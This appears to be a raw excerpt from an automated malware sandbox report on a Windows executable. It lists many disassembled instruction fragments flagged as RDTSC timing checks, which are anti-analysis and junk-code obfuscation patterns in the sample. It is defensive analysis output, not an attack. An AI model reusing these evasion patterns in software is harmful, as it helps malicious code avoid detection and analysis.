                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0AB8F second address: A0ABB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F2429065B4Ch 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2429065B50h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B33A second address: A0B344 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F242906E926h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DCAB second address: A0DCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DCAF second address: A0DCBD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F242906E926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DCBD second address: A0DD0A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2429065B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F2429065B48h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D275Ch], edx 0x0000002e push 00000000h 0x00000030 mov di, bx 0x00000033 push 00000000h 0x00000035 ja 00007F2429065B4Ch 0x0000003b xchg eax, esi 0x0000003c push ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C8A08 second address: 9C8A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F242906E936h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F242906E926h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10142 second address: A10154 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2429065B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007F2429065B4Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10154 second address: A1015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1015F second address: A10163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DEEA second address: A0DF09 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F242906E92Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F242906E92Ch 0x00000013 jl 00007F242906E926h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DF09 second address: A0DF1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2429065B4Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10163 second address: A101DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F242906E926h 0x0000000d jmp 00007F242906E92Ch 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 push ecx 0x00000016 mov ebx, dword ptr [ebp+122D2CB6h] 0x0000001c pop edi 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F242906E928h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 mov edi, dword ptr [ebp+122D3448h] 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ebx 0x00000044 call 00007F242906E928h 0x00000049 pop ebx 0x0000004a mov dword ptr [esp+04h], ebx 0x0000004e add dword ptr [esp+04h], 0000001Ch 0x00000056 inc ebx 0x00000057 push ebx 0x00000058 ret 0x00000059 pop ebx 0x0000005a ret 0x0000005b mov edi, dword ptr [ebp+122D2692h] 0x00000061 xchg eax, esi 0x00000062 push eax 0x00000063 push edx 0x00000064 push ecx 0x00000065 pushad 0x00000066 popad 0x00000067 pop ecx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A103AF second address: A103B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11345 second address: A11349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11349 second address: A11353 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2429065B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11353 second address: A11412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov ebx, 4B686E9Fh 0x0000000c sbb bx, EF1Ah 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F242906E928h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 jnl 00007F242906E931h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f jmp 00007F242906E92Bh 0x00000044 mov eax, dword ptr [ebp+122D0CF9h] 0x0000004a push 00000000h 0x0000004c push ebx 0x0000004d call 00007F242906E928h 0x00000052 pop ebx 0x00000053 mov dword ptr [esp+04h], ebx 0x00000057 add dword ptr [esp+04h], 00000019h 0x0000005f inc ebx 0x00000060 push ebx 0x00000061 ret 0x00000062 pop ebx 0x00000063 ret 0x00000064 xor dword ptr [ebp+122D344Dh], ebx 0x0000006a mov bl, C7h 0x0000006c push FFFFFFFFh 0x0000006e or ebx, 26558347h 0x00000074 nop 0x00000075 jmp 00007F242906E931h 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d push edx 0x0000007e jmp 00007F242906E932h 0x00000083 pop edx 0x00000084 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A141FA second address: A14226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F2429065B58h 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15157 second address: A1515D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1515D second address: A15161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A160CD second address: A160D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A160D6 second address: A160DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A160DA second address: A160DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A160DE second address: A16102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F2429065B4Bh 0x0000000f jo 00007F2429065B46h 0x00000015 popad 0x00000016 jng 00007F2429065B4Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19E88 second address: A19EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jns 00007F242906E93Eh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19EAD second address: A19EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19EB5 second address: A19EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19EB9 second address: A19EC9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F2429065B4Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDD14 second address: 9CDD18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C6BD second address: A1C73D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d mov eax, dword ptr [ebp+1245D004h] 0x00000013 mov dword ptr [ebp+122D28D3h], ebx 0x00000019 popad 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov ebx, dword ptr [ebp+1247E3D7h] 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F2429065B48h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 push ecx 0x00000049 mov edi, dword ptr [ebp+122D36E5h] 0x0000004f pop edi 0x00000050 mov eax, dword ptr [ebp+122D0CF1h] 0x00000056 or dword ptr [ebp+122D2B6Eh], ebx 0x0000005c push FFFFFFFFh 0x0000005e mov ebx, dword ptr [ebp+122D33F7h] 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 push ecx 0x00000068 pushad 0x00000069 popad 0x0000006a pop ecx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C73D second address: A1C743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1EE8B second address: A1EE8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1EE8F second address: A1EE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A20D20 second address: A20D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A20D24 second address: A20D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A054 second address: A2A058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A058 second address: A2A068 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F242906E926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A37D second address: A2A381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DA17 second address: A2DA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DA1B second address: A2DA1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DA1F second address: A2DA28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB3DB second address: 9BB3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2429065B46h 0x0000000a popad 0x0000000b js 00007F2429065B52h 0x00000011 jo 00007F2429065B46h 0x00000017 jbe 00007F2429065B46h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB3F8 second address: 9BB429 instructions: 0x00000000 rdtsc 0x00000002 je 00007F242906E93Eh 0x00000008 jmp 00007F242906E936h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F242906E92Dh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB429 second address: 9BB449 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2429065B4Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F2429065B46h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F1FB second address: A2F208 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F2BE second address: A2F2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F2C2 second address: A2F2C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A363E9 second address: A36409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2429065B58h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35082 second address: A35088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A358EB second address: A35937 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F2429065B5Ah 0x0000000c jmp 00007F2429065B59h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2429065B51h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35D48 second address: A35D79 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F242906E926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F242906E935h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F242906E92Fh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35D79 second address: A35D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2429065B4Eh 0x00000009 jbe 00007F2429065B46h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35D91 second address: A35D95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35D95 second address: A35D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35F4A second address: A35F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35F4E second address: A35F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F2429065B57h 0x0000000c jmp 00007F2429065B4Bh 0x00000011 pop eax 0x00000012 jnp 00007F2429065B5Ch 0x00000018 push edx 0x00000019 pop edx 0x0000001a jmp 00007F2429065B54h 0x0000001f push esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BD6A second address: A3BD7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jno 00007F242906E926h 0x0000000c pop ebx 0x0000000d popad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BD7F second address: A3BD83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BD83 second address: A3BDA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F242906E932h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BDA1 second address: A3BDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A7AE second address: A3A7E6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F242906E926h 0x00000008 jmp 00007F242906E936h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F242906E934h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A7E6 second address: A3A804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2429065B59h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AAA0 second address: A3AAA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AAA4 second address: A3AAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AAAE second address: A3AAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F242906E926h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AAB8 second address: A3AABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ADCC second address: A3ADD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ADD0 second address: A3ADE4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F2429065B4Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE18B second address: 9EE190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A496 second address: A3A4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2429065B4Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A4A9 second address: A3A4B3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F242906E926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A407FE second address: A40814 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnp 00007F2429065B46h 0x0000000d popad 0x0000000e jng 00007F2429065B4Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F5B3 second address: A3F5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F5B7 second address: A3F5D8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2429065B46h 0x00000008 jnl 00007F2429065B46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007F2429065B4Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03E57 second address: A03E5C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0476C second address: A04776 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04776 second address: A0477A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A048D0 second address: A048D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04BCD second address: A04C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F242906E92Fh 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov cl, 88h 0x00000010 lea eax, dword ptr [ebp+12485629h] 0x00000016 mov edi, eax 0x00000018 call 00007F242906E935h 0x0000001d mov edx, 564420AEh 0x00000022 pop ecx 0x00000023 nop 0x00000024 pushad 0x00000025 pushad 0x00000026 jbe 00007F242906E926h 0x0000002c jng 00007F242906E926h 0x00000032 popad 0x00000033 jg 00007F242906E935h 0x00000039 popad 0x0000003a push eax 0x0000003b push ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04C36 second address: A04C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04C3A second address: A04C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04C3E second address: 9EE18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 je 00007F2429065B46h 0x0000000e call dword ptr [ebp+122D22FAh] 0x00000014 jns 00007F2429065B73h 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d jmp 00007F2429065B4Bh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F8F0 second address: A3F8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F8F4 second address: A3F8FE instructions: 0x00000000 rdtsc 0x00000002 je 00007F2429065B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F8FE second address: A3F905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F905 second address: A3F90B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FACB second address: A3FAD7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F242906E92Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FC17 second address: A3FC3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F2429065B56h 0x0000000c pop edi 0x0000000d pushad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
